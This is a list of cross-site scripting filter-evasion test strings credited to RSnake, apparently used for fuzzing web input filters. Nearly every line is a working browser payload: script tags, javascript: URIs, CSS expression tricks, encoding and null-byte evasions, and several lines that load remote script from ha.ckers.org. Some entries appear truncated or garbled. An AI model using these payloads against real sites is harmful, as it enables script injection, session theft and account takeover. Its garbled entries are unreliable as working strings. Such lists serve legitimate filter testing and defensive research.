# Credit to RSnake (XSS filter-evasion test strings)
<SCRIPT>alert('XSS');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
SRC=
<IMG 6;avascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="  javascript:alert('XSS');">
<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a>
<IMG SRC=java%00script:alert(\"XSS\")>
<SCR%00IPT>alert(\"XSS\")</SCR%00IPT>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<IMG SRC="javascript:alert('XSS')"
<SCRIPT>a=/XSS/
\";alert('XSS');//
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
getURL("javascript:alert('XSS')")
a="get";
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
<HTML><BODY>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>